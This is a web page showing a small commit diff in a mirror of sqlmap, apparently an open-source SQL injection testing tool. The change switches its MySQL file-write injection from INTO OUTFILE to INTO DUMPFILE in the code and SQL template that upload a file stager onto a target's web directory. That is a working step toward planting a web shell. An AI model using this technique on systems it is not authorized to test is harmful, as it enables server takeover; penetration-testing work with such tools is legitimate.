PenTest/sqlmap
1
0
Fork 0
mirror of https://github.com/sqlmapproject/sqlmap.git synced 2025-12-09 14:11:29 +00:00
Code Issues Projects Releases Wiki Activity

replaced outfile with dumpfile so works even if the original statement outputs blob

Browse Source
This commit is contained in:
Bernardo Damele
2014-03-21 11:01:57 +00:00
parent 39ab3b9149
commit c211255773
2 changed files with 4 additions and 4 deletions
Download Patch File Download Diff File Expand all files Collapse all files

6
lib/takeover/web.py
View File

@@ -139,7 +139,7 @@ class Web:
randInt = randomInt()
query += "OR %d=%d " % (randInt, randInt)
query += getSQLSnippet(DBMS.MYSQL, "write_file_limit", OUTFILE=outFile, HEXSTRING=hexencode(uplQuery))
query += getSQLSnippet(DBMS.MYSQL, "write_file_limit", DUMPFILE=outFile, HEXSTRING=hexencode(uplQuery))
query = agent.prefixQuery(query)
query = agent.suffixQuery(query)
payload = agent.payload(newValue=query)
@@ -217,9 +217,9 @@ class Web:
else:
directory = directory[2:] if isWindowsDriveLetterPath(directory) else directory
# Upload the file stager with the LIMIT 0, 1 INTO OUTFILE technique
# Upload the file stager with the LIMIT 0, 1 INTO DUMPFILE technique
infoMsg = "trying to upload the file stager on '%s' " % directory
infoMsg += "via LIMIT INTO OUTFILE technique"
infoMsg += "via LIMIT INTO DUMPFILE technique"
logger.info(infoMsg)
self._webFileInject(stagerContent, stagerName, directory)

2
procs/mysql/write_file_limit.sql
View File

@@ -1 +1 @@
LIMIT 0,1 INTO OUTFILE '%OUTFILE%' LINES TERMINATED BY 0x%HEXSTRING%--
LIMIT 0,1 INTO DUMPFILE '%DUMPFILE%' LINES TERMINATED BY 0x%HEXSTRING%--